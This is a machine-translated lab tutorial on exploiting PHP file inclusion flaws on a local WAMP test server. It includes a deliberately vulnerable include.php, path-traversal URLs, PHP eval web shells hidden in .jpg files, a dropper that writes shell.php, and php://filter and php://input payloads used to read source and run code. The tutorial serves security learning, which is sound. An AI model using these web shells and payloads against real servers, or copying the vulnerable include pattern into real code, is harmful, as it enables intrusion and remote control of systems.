1 The file contains an introduction to how the vulnerability is exploited

After the first two sections have learned about file inclusion and the harm of its vulnerability , This section mainly talks about the utilization methods of file containing vulnerabilities .
Utilization mode ： In this section, the following six aspects are used to share the ways to exploit the file containing vulnerabilities .

• Read the contents of sensitive files ;
• Contains pictures directly GetShell;
• Include file write shell Document review GetShell;
• utilize PHP Encapsulate and read the contents of sensitive files ;
• utilize PHP Encapsulated transmission PHP Source code ;
• utilize PHP Package execution PHP sentence .

2 Experimental environment and preparation

（1） Drone aircraft （ The server ）： This experiment is based on WAMP Environment to test , Environment deployment process reference article 《【 Language environment 】WAMP Environment deployment and optimization — With win2008R2SP1 For the operating system 》,IP by 172.16.1.1.

• Under the root directory of the environment website , New folder FileInclusion, stay FileInclusion Create the following files under the folder to experiment .
• Create a new one txt file , Enter the following code , And rename to include.php.

<?php
$path = $_GET['path'];
echo "<h1>This is include.php!</h1>";
include $path;
?>

（2） test machine ： Real machine .
（3） The server is connected to the real machine VMnet1.

3 Use mode one ： Read sensitive files

3.1 Introduction to the experiment

Purpose ： Understand how to use file containing vulnerabilities to obtain local sensitive files of the server .

We can use the File Inclusion Vulnerability to read arbitrary files . When reading a file, you have the advantage ：

• The destination host file does not exist （ Path to the destination file , You can use absolute or relative paths ）;
• Have readable permissions for the file .

3.2 The experimental steps

To get the server local host File as an example ,Windows Under the system host The file path is c:\windows\System32\drivers\etc\hosts. The specific operation steps are as follows ：

（1） Real machine browser access http://172.16.1.1/FileInclusion/include.php?path=c:\windows\System32\drivers\etc\hosts, The web page shows , You can see that the local... Of the server is successfully displayed host The contents of the document .

（2） The above is written in absolute path , If relative path is adopted , You can add more …\ Indicates the parent directory to the root directory , Such as http://172.16.1.1/FileInclusion/include.php?path=..\..\..\..\..\..\..\..\windows\System32\drivers\etc\hosts, The web page shows , You can also read host file . about Windows System , Use this method to read , If the server is not deployed in C On the plate , You can't get the data ; about Linux System , Under the same root directory , There is no such problem .

4 Use method 2 ： Contains pictures directly GetShell

4.1 Introduction to the experiment

Purpose ： By exploiting the server File Inclusion Vulnerability , Use Chinese ant sword and picture Trojan horse （ With one sentence ）GetShell.

Experiment preparation ：
（1） Picture horse . Under the target machine root directory FileInclusion Create a new folder txt file , Input <?php @eval($_REQUEST['cmd']);?>, And named it muma.jpg, Let's assume that the file was saved in this location by an attacker through file upload or other vulnerabilities . Please refer to 《【 File upload vulnerability -04】 Server side detection and bypass instance （ contain MIME type 、 Suffix name 、 The contents of the document ）》

（2） Real machine ： Install Chinese ant sword , Reference article 《【 Ant sword tool -01】 Website management tools of the Chinese ant sword installation process and application examples 》.

4.2 The experimental steps

（1） Real machines use browsers to access http://172.16.1.1/FileInclusion/include.php?path=muma.jpg&cmd=print(123456);, Notice the semicolon at the end , You can see that you can activate the file and execute the contents after the equals sign .

（2） Chinese ant sword connection . because php The code is there jpg In the document , If you do not use other parsing vulnerabilities, you will not run the code inside , In the previous step, we successfully used http://172.16.1.1/FileInclusion/include.php?path=muma.jpg Execute the... In the picture horse PHP sentence , So it can be connected with Chinese ant sword . Open the Chinese ant sword , Add data and fill in the following information , Click Add .




（3） Management server . After adding, you can see the newly added content in the main interface of the software , Double click to manage the server .

5 Use method 3 ： Including Trojan write Shell

5.1 Introduction to the experiment

Purpose ： Exploit File Inclusion Vulnerability , Execute picture horse , Generate Shell Code . similarly , Other code can be generated .

Experiment preparation ：
（1） Picture horse . Under the target machine root directory FileInclusion Create a new folder txt file , Input <?php fputs(fopen('shell.php','w'),"<?php @eval(\$_REQUEST['cmd'])?>");?>（ This code means ： Create a name in the current directory shell.php The file of , The content is <?php @eval(\$_REQUEST['cmd'])?>）, And named it muma2.jpg, Let's assume that the file was saved in this location by an attacker through file upload or other vulnerabilities . Please refer to 《【 File upload vulnerability -04】 Server side detection and bypass instance （ contain MIME type 、 Suffix name 、 The contents of the document ）》

（2） Real machine ： Install Chinese ant sword , Reference article 《【 Ant sword tool -01】 Website management tools of the Chinese ant sword installation process and application examples 》.

5.2 The experimental steps

（1） Real machine browser access http://172.16.1.1/FileInclusion/include.php?path=muma2.jpg, The web page shows , No report error .

（2） Verify whether the code just executed successfully . Open the... In the target test Folder , You can see the successful generation shell.php file .

（3） Open the ant sword and connect shell.php. Right click to add data → Fill in data . As shown below, the Trojan horse is located in PHP In file , Can be accessed directly without resorting to file inclusion vulnerabilities . The new connection is as follows .

（4） Double click the new connection , Can successfully manage the server .

6 Use method 4 ： utilize PHP Encapsulation protocol — Read local file

We can use php Of file Protocol access to local system files

6.1 Introduction to the experiment

Purpose ： This way is similar to “ Use method 1 ” Consistent purpose , Due to the existence of this method , So learn .

Conditions ： requirement PHP In the configuration file allow_url_include Parameter is configured as On.

6.2 The experimental steps

Input in real browser http://172.16.1.1/FileInclusion/include.php?path=file://c:\windows\System32\drivers\etc\hosts, You can see that the contents of the file have been read successfully .

Be careful ： This method is similar to reading local files directly , Why use this method . Only in actual combat can we realize .

7 Use method 5 ： utilize PHP Encapsulation protocol — transmission PHP file

7.1 Introduction to the experiment

Purpose ： Read the website source code . The result of reading the file using method 1 and method 4 , If there is PHP The code will be executed unconditionally , That is to say, what we will see is PHP The result of code execution , If you want to see PHP Source code , This method is required .

Conditions ： requirement PHP In the configuration file allow_url_include Parameter is configured as On.

7.2 The experimental steps

（1） When accessing the real machine browser, enter http://172.16.1.1/FileInclusion/include.php?path=php://filter/read=convert.base64-encode/resource=shell.php, The contents displayed on the page are as follows . Here is the use of PHP Pseudo protocol to read files ,filter Means filter ：read Means to read the contents of the file , The reading mode is convert.base64-encode（ Read the file base64 code ）,resource Followed by the resource file name .

（2） Copy the displayed code . Paste into the online encoding and decoding tool , You can view the source code .

8 Use method 6 ： utilize PHP Encapsulation protocol — perform PHP Code （ Failure , Try again later ）

8.1 Introduction to the experiment

Purpose ： Without files locally or remotely , Direct execution PHP Code .
Conditions ： requirement PHP In the configuration file allow_url_include Parameter is configured as On.

8.2 The experimental steps

（1） The real machine turns on BurpSuite, Switch to repeater modular , Copy from the last experiment URL, The right choice Paste URL as request With URL Form add request . Click Send , You can see that the response content is consistent with the previous experiment . This experiment will use BurpSuite Execute through this request PHP Code .

（2） modify path Parameter is php://input, At the same time, add the desired... In the request body PHP Code <?php phpinfo();?>, Here's the picture , And click send . Display the result of probe statement execution in the response .

9 summary

（1） Summary of several execution methods of picture horse ：

• Exploit middleware parsing vulnerability , Different versions of middleware are often used in different ways . Refer to the following article ：
  《【 File upload vulnerability -07】 Middleware file parsing vulnerability overview and examples ——Apache、IIS and Nginx》;
• utilize .htaccess modify Apache Local configuration . Reference resources 《.htaccess Attack experiments 》
• Exploit File Inclusion Execution Vulnerability . Refer to this article .

（2） Master the six ways to exploit vulnerabilities contained in files .
（3） utilize PHP The precondition of the encapsulation protocol is to enable remote file inclusion （PHP In the configuration file allow_url_include Parameter is configured as On）, But generally, this setting is turned off by default , So why PHP What is the use of the encapsulation protocol ？ It is mainly used to fight CTF, And as a back door for permanent control .

reference

《php://》 Various pseudo protocols are introduced as follows .